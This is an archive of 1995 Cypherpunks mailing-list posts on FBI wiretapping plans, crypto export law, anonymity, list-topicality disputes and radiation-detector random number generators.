Message-ID: <Pine.LNX.3.91.951103152502.23689A-100000@ima.net>


On Thu, 2 Nov 1995, Bryce wrote:

> That's one way to look at it.  Of course since the "license 
> requirements" had to do with some obscure administrivia that nobody
> thought would apply to ISP's, none of the 6 or so ISP's in Hong Kong
> had thought to apply for it.  One has to wonder why the gov't pulled
> the plug on 5 of them without so much as a warning, much less a
> chance to comply.
> 
> 
> Did I say 5?  Oh yes.  The largest HK ISP-- and the one with closest
> ties to the government-- had gone ahead and applied for the license
> just a couple of weeks before the blackout.  Corruption is the modus
> operandi in HK, so I wouldn't be at all surprised if that one ISP
> got a special favor by being warned of the impending black-out, or
> even if it had a hand in instigating it.

Look: I've followed very closely all that sad story, as I routinely 
participate to the meetings between the Government's Telecom regulator 
(OFTA) and the representatives of the IT industry regarding ISP 
regulations and the difficult relationships with the telephone carrier 
(in the role, incidentally, of a strong advocate of de-regulation). 

The cutoff was determined by an initiative of the Police's Commercial
Crime Bureau, tipped by complaints from that provider you're mentioning
(HK Supernet). The initiative was taken without any pressure from above,
and actually the CCB had to backpedal very hurriedly after the
intervention of several legislators (I assisted to an embarassing panel
meeting where one of them scolded the chief of the CCB and advanced the
hypothesis of a possible lawsuit by the providers agaist the Government
for unlawful action, due to a few clumsy procedural "faux pas" by the
police). In other words, the whole matter looked more like "Inspector
Clouseau vs the ISP's" than a perfidious conspiracy to suppress the
freedom of speech. 

In any case, before Perry (rightly) send us stern reminders of the scarce
crypto relevance of this thread, let's take it out of Cypherpunks and, if
someone is interested, let's continue by e-mail. 

Cheers --

Enzo





From carolann at censored.org  Fri Nov  3 01:04:59 1995
From: carolann at censored.org (Censored Girls Anonymous)
Date: Fri, 3 Nov 1995 17:04:59 +0800
Subject: FBI Wants to Wiretap One of Every 100 Phones in Urban Areas
Message-ID: <199511030134.BAA04330@mailhost1.primenet.com>


This story broke on ABC radio news 26 hours ago.
It is still running as lead story.

Love Always,

Carol Anne...still amazed it's lead story
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann at censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/






From llurch at networking.stanford.edu  Fri Nov  3 01:32:54 1995
From: llurch at networking.stanford.edu (Rich Graves)
Date: Fri, 3 Nov 1995 17:32:54 +0800
Subject: [NOISE, NOTE HEADERS] Re: FBI Wants to Wiretap One of Every 100 , Phones in Urban Areas
In-Reply-To: <9511031007.AA0024@localhost>
Message-ID: <Pine.ULT.3.91.951103001110.25597G-100000@Networking.Stanford.EDU>


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 3 Nov 1995 clarkm at cnct.com wrote:

> > On Fri, 3 Nov 1995 clarkm at cnct.kom wrote:
> > 
> > > Thanks for this item!  Two little excerpts jump out at me.
> > 
> > Gee, I hope they didn't spook you too badly when they jumped out at you 
> > like that. I can tell you're a little jumpy.
> 
> Hi Rich!  Thx for changing my domain, I'm sure it fooled SAIC.

I can only hope you're joking, but based on your last article, I'm not so
sure. That was intended as a small joke for anyone using PGP; see the
X-PGP-Key header in the original message. 

You really should have talked to Steve Pizzo before bastardizing his
article. Now you might get written up again as an example of the
conspiracy wackos on the net. I suppose you view any publicity as a
positive. I wholly support that goal. 

> > By whom is the FBI being sued? What is the case number? Who are the 
> > lawyers? What are their Bar numbers? How many times have they been 
> > disciplined for bringing frivolous suits?
> 
> EPIC.

EPIC has indeed made an FOIA claim and sued the FBI, but not for the
reasons stated, which is why I assumed you were talking about something
else. Again, Spotlight being vague about evidence that doesn't really
support their points. The case is C.A. No. 94-1720 (CRR) in D.C.  You can
write to the court for the full record, at duplication cost. 

I fully support EPIC's position. My apologies for confusing the message
with the second-hand, third-rate messenger. 

I notice you added Arnie Lerma to the recipient list. Didn't he publicly 
dissociate himself from you guys? Doesn't he have other things on his 
mind? I have another little joke just for him on my machine at 
gopher://dorms.stanford.edu:70/0R478556-480696-/win95netbugs et seq (the 
file actually goes all the way to byte 1149418).

[Big Bird deleted]

- -rich
 [Followups out of cpunks, please]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJnZhY3DXUbM57SdAQE0LgQArrZJMe0SUyScgQ/AVdJIfwNGIjpg7eqc
uIPQYs/1zx1edkL5hEhFaU3QnkJanRyxbNrx6sRLDv1veFqCFV8CHD9vmU1UFKMr
h9C+/B0wXB1JuhNmUK07I1ontVcCy6DDC12RR1Ar+yhFXbD6TsGY5ZF6S6KeDqjb
oV4R5rzFwaM=
=/3TK
-----END PGP SIGNATURE-----





From gnu at toad.com  Fri Nov  3 01:51:00 1995
From: gnu at toad.com (John Gilmore)
Date: Fri, 3 Nov 1995 17:51:00 +0800
Subject: Transcript of Bernstein hearing is now available
Message-ID: <9511020308.AA25206@toad.com>


We received the transcript of October 20's oral hearing from the court
stenographer.  It's up on the EFF Web site at:

http://www.eff.org/pub/Legal/Cases/Bernstein_v_DoS/Legal/951020_hearing.transcript

This is from Dan Bernstein's case, which is trying to get the crypto
export laws invalidated as unconstitutional.  This particular hearing
is about the government's motion to throw the case out of court
because the courts don't have jurisdiction to decide the issue.  Some
of it is deep legalese, and some of it is quite readable.

There's still no news from the judge on what her decision is, or when
she will decide.

	John Gilmore





From tcmay at got.net  Fri Nov  3 01:52:17 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 3 Nov 1995 17:52:17 +0800
Subject: Hit-and-Run Anonymous Posts (Re: "Dr." Fred)
Message-ID: <acbcfb6801021004664c@[205.199.118.202]>


At 10:22 AM 11/1/95, Dr. Frederick B. Cohen wrote:

(quoting an anonymous poster)

>> The difference, of course, is that its almost impossible
>> to have sympathy for Dr. Fred. His hustle is for a hell
>> of a lot more than subsistence. He was also never actually
>> a master of his field, a fact that becomes increasingly
>> obvious as our exposure to him goes on. Now he's reduced
>> himself to trying to collect someone else's winnings.
>
>Sour grapes, and from an anonymous poster too.  Oooo - I'm insulted.
>
>I have been thinking about the issues of anonymity for some time, and I
>have been convinced for some time that you can't have both integrity and
>anonymity.  I thought there might be ways to accomplish this, but the
>cypherpunks have convinced me it isn't true.  Show some integrity and
>tell us who you are.

I've also found that anonymous persons are usually the most prone to
hit-and-run attacks and flames. I usually only briefly scan anonymous posts
and then delete them. Some people hide behind anonymity to launch
scurrilous attacks. Best to just ignore them, in my opinion.

Exceptions are the cases when an anonymous source has something "sensitive"
to contribute, such as the release of the putative MD4 code, and the like.

And there have of course been thoughtful anonymous essays.

Anonymity is under some assault today. I think it important not to throw
out the very basic advantages of allowing anonymity just because some abuse
occurs. (The issue is not that "allowing" it is good, but that "banning" it
would require drastic and draconian enforcement measures.)

Pseudonyms are another matter entirely. Some are classy (Pr0duct Cypher,
Black Unicorn, Lucky Green), some are oafish (S Boxx), some are ephemeral.
Persistence of the identity, as when backed by digital signatures, is
important. (Though not essential, yet.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From perry at piermont.com  Fri Nov  3 01:54:46 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Fri, 3 Nov 1995 17:54:46 +0800
Subject: IBM's Microkernal
In-Reply-To: <199511011817.TAA17785@utopia.hacktic.nl>
Message-ID: <199511011832.NAA02128@jekyll.piermont.com>



Anonymous writes:
> 
> Responding to msg by perry at piermont.com ("Perry E. Metzger") on 
> Wed, 01 Nov 11:51 AM
> 
> >Why is this being sent to cypherpunks? Its totally 
> >irrelevant.
> 
> 
> It's related to IBM's work on machine/code interface security, 
> encryption and authentication capabilities.

No it isn't. Its just an operating system microkernel. These typically
just provide very low level process abstractions to allow device
drivers and operating system interfaces to be built as processes. It
has nothing WHATSOEVER to do with cryptography.

I realize that the word "code" appeared in the article, but just
because the word "code" gets used doesn't mean we are talking about
cryptography.

By the way, learn how to spell "kernel".

Perry





From gjeffers at socketis.net  Fri Nov  3 02:06:04 1995
From: gjeffers at socketis.net (Gary Jeffers)
Date: Fri, 3 Nov 1995 18:06:04 +0800
Subject: censored with Perry
Message-ID: <199511031355.HAA16831@mail.socketis.net>


Enzo Michelangeli writes:

>In any case, before Perry (rightly) send us stern reminders of the scarce
>crypto relevance of this thread, let's take it out of Cypherpunks and,
>if someone is interested, let's continue by e-mail.

   Perry is again narrowly defining allowable speech on Cypherpunks.
Encryption becomes a trivial topic if its best medium is taken by the
States. Perry is still in his "only encryption algorithms in C is a
proper topic for Cypherpunks" mode. This is a direction that if followed
would take the vitality and relevance out of the Cypherpunks list. Perry
does a disservice for Cypherpunks.

   Since when did Cypherpunks become the mailing list fit for Perry? Perry
makes a big deal out of "nobody speaks for Perry" yet on Cypherpunks he
has decided that he sets the parameters for allowed speech. When did Perry
come to own the list? Where did he get this "authority" to tell other
Cypherpunks to shut up? As Perry often presumptiously and rudely reminds
C'punks that their speech is not tolerable, we must also take the time
and trouble to occasionally tell Perry to shove his opinions up his ass.

                                                         Gary Jeffers







From futplex at pseudonym.com  Fri Nov  3 02:34:38 1995
From: futplex at pseudonym.com (Futplex)
Date: Fri, 3 Nov 1995 18:34:38 +0800
Subject: Radiation Detectors from Aware Electronics
In-Reply-To: <9510038153.AA815390510@houston_cc_smtp.hai-net.com>
Message-ID: <199511031009.FAA11845@opine.cs.umass.edu>


Perry writes:
> There have been several requests for information on the company that 
> makes the radiation detectors with RS232 interfaces that I mentioned.
>      
> Here is how to reach them:

Skip writes:
> So what does this have to do with this mailing list??

Perry recently recommended the use of background-radiation detectors as 
good cheap true RNGs. Properly deployed cryptography generally depends upon
excellent PRNGs, or preferably hardware RNGs.

Perhaps you overlooked that rather lengthy thread, Skip ?

-Futplex <futplex at pseudonym.com>





From edge at got.net  Fri Nov  3 02:48:43 1995
From: edge at got.net (Jay Campbell)
Date: Fri, 3 Nov 1995 18:48:43 +0800
Subject: censored? corrected [Steve Pizzo cited in The Spotlight]
Message-ID: <199511031144.DAA08978@you.got.net>


>	Is it?  This is the _one_ thing in the article (is that term
>giving it too much legitimacy?) that I whought was barely true.  Whoever
>controls the root level DNS servers effectively controls the Internet.
>I postulated a couple of months ago about how the US Govt might attempt
>to censor the rest of the world: "Remove lurid.porno.site.other-country
>from your DNS system within 72 hours or we will remove references to
>your DNS servers from the root level servers.".  (I also speculated that
>if the US Govt tried doing this, that an 'underground' DNS system would
>form almost immediately.)

[off topic]

It almost did when InterNIC announced it's recent (and abrupt) new pricing
structure for domain names. All it would take is an additional entry in
{dns}/root.cache - even a small company with decent VC (and multiple
geographic locations, preferably) could have pulled this off and made a
decent chunk of change underselling InterNIC; with a slight shift in the way
things are done, the model could have been opened up into a competitive
market with price and (GASP!) customer service/response time wars. [FADE IN:
Look, Jim! I submitted my domain through Campbell.NET 30 seconds ago and
it's already live .. That's nothing, Terry, ...]

Yet another 'axiom' that turns out to be nothing more than convention.
--
   Jay Campbell                edge at got.net - Operations Manager
   -=-=-=-=-=-=-               Sense Networking, Santa Cruz Node
   Jay at Campbell.net            got.net? PGP MIT KeyID 0xACAE1A89           
 
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."






From edge at got.net  Fri Nov  3 02:53:21 1995
From: edge at got.net (Jay Campbell)
Date: Fri, 3 Nov 1995 18:53:21 +0800
Subject: alt.anonymous.messages considered harmful
Message-ID: <199511031132.DAA08776@you.got.net>


>Those who do get the message, can not notice a cancel attack; those
>who don't, would have to carefully search for suspicious Supersedes:
>lines and monitor the control newsgroup. A denial of service attack by
>manipulated Path: header cannot be detected by the victim.

cancels aren't the only monster .. we have a vigilante up the pipe somewhere
deleting a chunk of every post set in certain alt.binaries.* groups without
a cancel - they're simply not passing along a piece of every set. this is
irritating (as an ISP) since it should be an individual site's
responsibility (if not the user emselve's), hence the term 'vigilante' as
opposed to 'concerned administrator'. the fix is to get multiple feeds, of
course, but everyone in the area happens to be fed through this branch ..
but i digress. 
--
   Jay Campbell                edge at got.net - Operations Manager
   -=-=-=-=-=-=-               Sense Networking, Santa Cruz Node
   Jay at Campbell.net            got.net? PGP MIT KeyID 0xACAE1A89           
 
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."






From futplex at pseudonym.com  Fri Nov  3 02:58:16 1995
From: futplex at pseudonym.com (Futplex)
Date: Fri, 3 Nov 1995 18:58:16 +0800
Subject: censored with Perry
In-Reply-To: <199511031355.HAA16831@mail.socketis.net>
Message-ID: <199511031020.FAA24928@opine.cs.umass.edu>


Enzo Michelangeli writes:
> In any case, before Perry (rightly) send us stern reminders of the scarce
> crypto relevance of this thread, let's take it out of Cypherpunks 

Gary Jeffers writes:
>    Perry is again narrowly defining allowable speech on Cypherpunks.

Since Perry hasn't said a damn thing about this Hong Kong ISP thread on the 
list, I suggest that you're wasting your time chasing around a hypothetical
situation.  

-Futplex <futplex at pseudonym.com>	Me speak for Perry ?
        "It just couldn't be, and only a fool would say that" -Steely Dan, 1972





From edge at got.net  Fri Nov  3 03:09:06 1995
From: edge at got.net (Jay Campbell)
Date: Fri, 3 Nov 1995 19:09:06 +0800
Subject: FBI seeks huge wiretapping system
Message-ID: <199511031202.EAA09281@you.got.net>


>I was being facetious. The point is that the government has no
>inherent right to tap our phones -- indeed, it didn't do so for nearly
>the first 200 years of our existance, and we did just fine -- better,
>in fact. 

It is a well-known fact that it was common practice for NSA operatives to
masquerade as Injuns in the 1800's and waylay Pony Express riders in order
to intercept communications between targeted parties. This practice lost
popularity towards the end of the century with the advent of boxed cereal,
and with it the Lone Ranger Decoder Ring, since the operatives were too
underfunded to afford anything more than oatmeal.

[ducks]
--
   Jay Campbell                edge at got.net - Operations Manager
   -=-=-=-=-=-=-               Sense Networking, Santa Cruz Node
   Jay at Campbell.net            got.net? PGP MIT KeyID 0xACAE1A89           
 
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."






From usura at berserk.com  Fri Nov  3 03:32:08 1995
From: usura at berserk.com (Alex de Joode)
Date: Fri, 3 Nov 1995 19:32:08 +0800
Subject: Radiation Detectors from Aware Electronics
Message-ID: <g4NZDD1w165w@asylum.berserk.com>


sharborth at hai-net.com writes in an followup to perry at piermont.com:
....
:: There have been several requests for information on the company that 
:: makes the radiation detectors with RS232 interfaces that I mentioned.
[..]
:: Perry
: 
:      So what does this have to do with this mailing list??
:      Skip

The cypherpunks mailing list has a lot to do with cryptography,
an important element of cryptography is randomness one way that
seems to be a superior source for obtaining random data is 
radioactive decay, radiation detectors wich have an RS232 interface 
can be hooked up to an computer and thus act as a source of randomness.

    -AJ-
--
kill -9 hkk at netcom.com .. process killed .. lawyer terminated successfully





From junger at pdj2-ra.F-REMOTE.CWRU.Edu  Fri Nov  3 05:58:50 1995
From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger)
Date: Fri, 3 Nov 1995 21:58:50 +0800
Subject: Risks of ``foreign persons'' under the ITAR
Message-ID: <m0tBMJy-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>


It is usually assumed that a foreign person outside the United States
runs no risks if he posts cryptographic software to the net or
otherwise discloses it to other foreign persons, although technically
that is a violation of the United States International Traffic in Arms
Regulations.

I note, however, that in an article entitled ``Export Controls on
Encryption Software'' by Ira S. Rubenstein, dated October 17, 1994 
(which apparently was distributed at some legal conference) the
following passage appears in Section 4(3):

                     ----------------

Finally, foreign employees of those companies or any foreign person
who runs afoul of export controls on technology transfers may face
severe immigration consequencs.[83]  Under the Immigration and
Nationality Act,[84] as revised by the immigration act of 1990,[85] an
alien who seeks entry to the U.S. to engage in activities that violate
or evade export control laws is excludable.[86]  Similarly, an alien
who has engaged, is engaged, or at any time after entry engages in
such activities is deportable.[87]

                           [Notes]

[83] For a detailed discussion see generally Rubinstein, ``Export
Controls and Immigration Law,'' 93-3 Immigration Briefings (Mar.
1993). 

[84] Immigration and Nationality Act of 1952, Pub. L. No. 82-414, 66
Stat. 163 (codified as amended at 8 USC \S\S 1101-1524) (hereinafter
INA).

[85] Immigration Act of 1990, Pub. L. No. 101-649, 104 Stat. 4978
(hereinafter IMMACT 90).

[86] INA \S 212(a)(3)(A)(i)(II), 8 USC \S 1182(a)(3)(A)(i)(II).

[87] OMA \S 21(a)(4)(A)(i), \S 1251(a)(4)(A)(i).

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger at pdj2-ra.f-remote.cwru.edu    junger at samsara.law.cwru.edu






From bplib at wat.hookup.net  Fri Nov  3 06:36:37 1995
From: bplib at wat.hookup.net (Tim Philp)
Date: Fri, 3 Nov 1995 22:36:37 +0800
Subject: video as a source of public randomness
In-Reply-To: <acbf02ca0402100496c4@[205.199.118.202]>
Message-ID: <Pine.OSF.3.91.951103090838.4011B-100000@nic.wat.hookup.net>


	Would not generating random numbers using video sources be
suseptable to the same 'external' influences as generating random numbers
from radio static? External RF fields could skew the 'randomness' of the
data. 
	As another thought, has anyone done any work on RNGs involving
chaotic processes such as fluid dynamics and turbulent flow? I suspect
that pressure, or other parameter variences, in turbulent flow could yield
good random numbers. As a bonus, these parameters are easily measurable 
without special, exotic, equipment and should be inexpensive

Regards, Tim Philp

===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys at swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================








From perry at piermont.com  Fri Nov  3 06:36:37 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Fri, 3 Nov 1995 22:36:37 +0800
Subject: Radiation Detectors from Aware Electronics
In-Reply-To: <9510038153.AA815390510@houston_cc_smtp.hai-net.com>
Message-ID: <199511031419.JAA08735@jekyll.piermont.com>



sharborth at hai-net.com writes:
>      So what does this have to do with this mailing list??

Generating good random numbers is key to operating a solid
cryptographic system. I've argued that computer interfaced radiation
detectors are the optimal way of generating such numbers because they
are hard to screw up -- biased diode noise and other sources are too
easy to misdesign or misuse. Aware is a source of such detectors.

Perry

> There have been several requests for information on the company that 
> makes the radiation detectors with RS232 interfaces that I mentioned.
>      
> Here is how to reach them:
>      
> Aware Electronics
> P.O. Box 4299
> Wilmington, DE 19807
> Phone (800) 729-5397
>       (302) 655-3800
>      
>      
> Perry
> 
> 





From perry at piermont.com  Fri Nov  3 06:50:05 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Fri, 3 Nov 1995 22:50:05 +0800
Subject: Sources of randomness
In-Reply-To: <acbf085205021004e36c@[205.199.118.202]>
Message-ID: <199511031427.JAA08758@jekyll.piermont.com>



Timothy C. May writes:
> I meant a t.v. channel, as in broadcast t.v., such as is easily gotten with
> rabbit ears, or nothing (since the idea is to get noise, from the ether, or
> from the tuner itself). A snow-filled picture has pixels which are unlikely
> in the extreme to be predicted/deduced by outside attackers, who cannot
> know the details of antenna orientation, microscopic variations in
> geometry, LRC, tuner sensitivity, etc. That is, snowy pictures are not
> guessable.

I'm not so sure. There may be hidden patterns we don't notice. Its on
little things like this that a cryptanalyst would try to pry open a
hole in a system. I'm unwilling to predict that the patterns are
unguessable based purely on gut instinct. As Bob Morris of the NSA has
said, never underestimate the effort your advesary will go to in order
to read your traffic.

I'll stick to recommending radioactive sources for now. Quantum
mechanics is your friend, and detectors from places like Aware are
cheap.

Perry





From s1113645 at tesla.cc.uottawa.ca  Fri Nov  3 07:13:37 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Fri, 3 Nov 1995 23:13:37 +0800
Subject: What!!!
In-Reply-To: <acbef6c303021004c367@[205.199.118.202]>
Message-ID: <Pine.3.89.9511030329.B15438-0100000@tesla.cc.uottawa.ca>




On Thu, 2 Nov 1995, Timothy C. May wrote:

> At 11:25 PM 11/2/95, tony266 at vabeach.email.net wrote:
> 
> >Can someone tell me this cypherpunks is all about???
> 
> Grammar not best subject his. List sense make after read for time.
Quibble quibble. He's referring to cypherpunks the list in the singular, not
us the masses in the plural.
> 
> --Klaus!
> 
> More seriously, when you subscribed you undoubtedly got a "Welcome"
> message. I suggest you read it.
> 
Mayhap he's another person who's lists are gradually being fused into cpunks
due to mass forwarding :-)





From ljo at ausys.se  Fri Nov  3 07:19:58 1995
From: ljo at ausys.se (Johansson Lars)
Date: Fri, 3 Nov 1995 23:19:58 +0800
Subject: Info needed on observers
Message-ID: <95Nov3.093928gmt+0100.53773@void.ausys.se>




>I am currently preparing a paper on payment systems for the Internet
>and related issues.  I recently found out that so-called observers could
>be placed on smart cards (in order to prevent double spending, or even to
>prevent people from cheating on taxes...).
>
>To be honest that's about all I know about observers and I am very eager
>to find out more.  I am, however, having a hard time finding interesting
>references on this subject.
>
>Hence, all suggestions to get me started would be extremely welcome.
>Questions of particular interest are: possible functions (and limits),
>how 'real' are they already?, what about privacy?, ...
>
>Many thanks in advance.

Leo,

The concept 'Wallet (Databases) with Observers' was introduced by
David Chaum and Torben Pryds Pedersen at Crypto '92. See the
proceedings of that conference. Put shortly, it is a method of preventing
double spending of digital cash, stored on a smart card, and still
provide full payer anonymity.

Since then, others have worked on improving the original protocol,
e.g. Ronald Cramer, Niels Ferguson and Stefan Brands. In particular
the system by Stefan Brands have drawn much attention since it was
said to offer "provable security". It is his protocol that is used in the
european project CAFE.

In CAFE, each user is thought to have a PDA (Personal Digital Assistant)
which stores the digital cash. The observer is a smart card that has to
be inserted into the PDA in order to spend that cash. I don't know how
far this project has come, implementation wise but I think another project,
called SWAP was about to test these electronic wallets in practise.

Regards,
/Lars Johansson
ljo at ausys.se






From jya at pipeline.com  Fri Nov  3 07:29:56 1995
From: jya at pipeline.com (John Young)
Date: Fri, 3 Nov 1995 23:29:56 +0800
Subject: Kallstrom Calls All Calls Tappable
Message-ID: <199511031441.JAA18237@pipe2.nyc.pipeline.com>


   11-3-95. Wash Post:

   "Privacy Groups Assail FBI's Wiretapping Plan" [Excerpt]


   James Kallstrom, assistant FBI director in charge of the
   New York field division, argues that the proposal would in
   fact reduce the FBI's surveillance authority. "Today ... we
   could tap all the phones in the United States," he said,
   referring to older, pre-digital technology. Under the plan,
   the FBI's surveillance ability would shrink to a maximum of
   1 percent of simultaneous telephone calls from any one
   telephone switch, he said.

   Kallstrom said a typical central switching office in New
   York that serves 50,000 telephone lines has a capacity to
   carry only 5,000 calls simultaneously. It is the latter
   number, not the former, he said, on which the FBI bases its
   calculations. So the highest level of simultaneous
   surveillance in that area, he said, would be 50 lines.

   "We've never done that many" taps at one time, he said. But
   in a "worst-case scenario," such as a major act of
   terrorism, the agency might need such ability, he said. "I
   think it's a reasonable, minimal, conservative number."













From sunder at amanda.dorsai.org  Fri Nov  3 07:31:56 1995
From: sunder at amanda.dorsai.org (Ray Arachelian)
Date: Fri, 3 Nov 1995 23:31:56 +0800
Subject: Bruce Schneier's Applied Cryptography, 2nd Edition
In-Reply-To: <acbe05a801021004ca84@DialupEudora>
Message-ID: <Pine.SUN.3.91.951103094647.25772G-100000@amanda.dorsai.org>


On Wed, 1 Nov 1995, Norman Hardy wrote:

> Stanford University Book Store (om compus) has a bunch at about $49.

I just picked up a copy from Computer Book Works in NYC (On Warren Street 
between Church & Broadway near City Hall.)  They only had the softcover 
version there.

Now does anyone want my old 1st edition? :-)

==========================================================================
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. |   _ |>
  \|/  |sunder at dorsai.org| Where day by day, yet another   |   \ |
<--+-->|                 | Constitutional right vanishes.  |    \|
  /|\  |    Just Say     |                                 |    <|\
 + v + | "No" to the NSA!| Jail the censor, not the author!|    <| n
===================http://www.dorsai.org/~sunder/=========================






From perry at piermont.com  Fri Nov  3 07:32:32 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Fri, 3 Nov 1995 23:32:32 +0800
Subject: Radiation Detectors from Aware Electronics
In-Reply-To: <199511031009.FAA11845@opine.cs.umass.edu>
Message-ID: <199511031440.JAA08790@jekyll.piermont.com>



Futplex writes:
> Perry recently recommended the use of background-radiation detectors as 
> good cheap true RNGs. Properly deployed cryptography generally depends upon
> excellent PRNGs, or preferably hardware RNGs.

Just one comment -- I think one is better off with a tiny cheap
radiation source when using such a system than in depending on
background, but the point is the same...

Perry





From perry at piermont.com  Fri Nov  3 07:32:35 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Fri, 3 Nov 1995 23:32:35 +0800
Subject: censored with Perry
In-Reply-To: <199511031355.HAA16831@mail.socketis.net>
Message-ID: <199511031439.JAA08779@jekyll.piermont.com>



Gary Jeffers writes:
> Enzo Michelangeli writes:
> 
> >In any case, before Perry (rightly) send us stern reminders of the scarce
> >crypto relevance of this thread, let's take it out of Cypherpunks and,
> >if someone is interested, let's continue by e-mail.
> 
>    Perry is again narrowly defining allowable speech on Cypherpunks.
> Encryption becomes a trivial topic if its best medium is taken by the
> States. Perry is still in his "only encryption algorithms in C is a
> proper topic for Cypherpunks" mode.

No, I don't think that, Mr. Jeffers, but I must admit that my opinion
is that random political crap (NOT careful announcements by the likes
of jya at pipeline.com of reprints of articles on the new FBI wiretap
garbage) doesn't belong. 

> This is a direction that if followed
> would take the vitality and relevance out of the Cypherpunks list. Perry
> does a disservice for Cypherpunks.

I'm sorry, but you do a disservice to the cause of freedom. People are
trying to get work done to actually get cryptographic systems written,
deployed, and popularized, and the sort of crap that fills this place
periodically prevents people from working together towards that
end. If you want to talk about politics, go to Libernet or some such. 

Tim May will doubtless disagree, but he has nothing else to do in life
than read the net so his incentives to see traffic minimized aren't
the same as other people's.

>    Since when did Cypherpunks become the mailing list fit for Perry?

Look, its simple. If you want the FBI and NSA to win, post lots of
crap here. Nothing will help them out more than clogging one of the
few communications channels available to people interested in
spreading cryptography. If you are really successful, all the smart
people will leave (as has happened in waves before -- the losses of
Steve Bellovin and (effectively) Phil Karn are still felt) and you
will have totally destroyed the channel.

> we must also take the time and trouble to occasionally tell Perry to
> shove his opinions up his ass.

If you want the anti-crypto people to win, nothing can help nearly so
much as your attitude. I'm glad to see what side you are on.

Perry





From perry at piermont.com  Fri Nov  3 07:32:45 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Fri, 3 Nov 1995 23:32:45 +0800
Subject: Kallstrom Calls All Calls Tappable
In-Reply-To: <199511031441.JAA18237@pipe2.nyc.pipeline.com>
Message-ID: <199511031451.JAA08816@jekyll.piermont.com>



John Young writes:
>    "Privacy Groups Assail FBI's Wiretapping Plan" [Excerpt]
> 
>    James Kallstrom, assistant FBI director in charge of the
>    New York field division, argues that the proposal would in
>    fact reduce the FBI's surveillance authority.

Kallstrom is the guy who was using the example of snuff films (a known
urban legend) to try to FUD the audiance at the Bar Association debate
into supporting key escrow.

It appears, by the way, that the FBI may have goofed here. Even Steve
Post, the morning classical radio announcer on WNYC-FM in New York,
was making fun of the FBI this morning.

[Lets try not to make this into an extensive thread. We all have work
to do. For example, I have a 4.4BSD IPSEC implementation in my
possession that I don't have time to integrate into NetBSD and FreeBSD
in the next few weeks. Any volunteers out there?]

Perry





From sharborth at hai-net.com  Fri Nov  3 07:55:13 1995
From: sharborth at hai-net.com (sharborth at hai-net.com)
Date: Fri, 3 Nov 1995 23:55:13 +0800
Subject: Radiation Detectors from Aware Electronics
Message-ID: <9510038154.AA815422683@houston_cc_smtp.hai-net.com>


     Perry -
     
     Sorry for the rude question.  I have been following this thread 
     closely but must have missed the original message regarding using 
     radiation detectors to produce random numbers.
     
     Skip


______________________________ Reply Separator _________________________________
Subject: Re: Radiation Detectors from Aware Electronics 
Author:  perry at piermont.com at internet
Date:    03-11-95 09:23


sharborth at hai-net.com writes:
>      So what does this have to do with this mailing list??
     
Generating good random numbers is key to operating a solid 
cryptographic system. I've argued that computer interfaced radiation 
detectors are the optimal way of generating such numbers because they 
are hard to screw up -- biased diode noise and other sources are too 
easy to misdesign or misuse. Aware is a source of such detectors.
     
Perry
     
> There have been several requests for information on the company that 
> makes the radiation detectors with RS232 interfaces that I mentioned. 
>      
> Here is how to reach them:
>      
> Aware Electronics
> P.O. Box 4299
> Wilmington, DE 19807
> Phone (800) 729-5397
>       (302) 655-3800
>      
>      
> Perry
> 
> 






From bdolan at use.usit.net  Fri Nov  3 08:30:23 1995
From: bdolan at use.usit.net (Brad Dolan)
Date: Sat, 4 Nov 1995 00:30:23 +0800
Subject: Sources of randomness
In-Reply-To: <Pine.3.89.9511030915.B49857-0100000@tesla.cc.uottawa.ca>
Message-ID: <Pine.SOL.3.91.951103102756.19997B-100000@use.usit.net>




On Fri, 3 Nov 1995 s1113645 at tesla.cc.uottawa.ca wrote:

> 
> 
> On Fri, 3 Nov 1995, Perry E. Metzger wrote:
> 
> > I'll stick to recommending radioactive sources for now. Quantum
> > mechanics is your friend, and detectors from places like Aware are
> > cheap.
> What prices have you got listed? Is the equipment sensitive enough to get 
> lots of entropy from a normal environment or do you need artificial sources
> of radioactivity? (easy, safe and cheap enough to get?)


Safe, easy-to-obtain gamma sources:  orange fiesta-ware pottery (at flea 
markets), old-style Coleman lantern mantles (not sure about the new 
ones), uranium-ore "health pillows" (Sunshine Mine, 408-225-3670).

-bd

> Got any clues on random bits vs. time?
> 
> Someone said this was discussed before, I caught the thread on the 
> detector being listed but not any discussion of the product itself. Could 
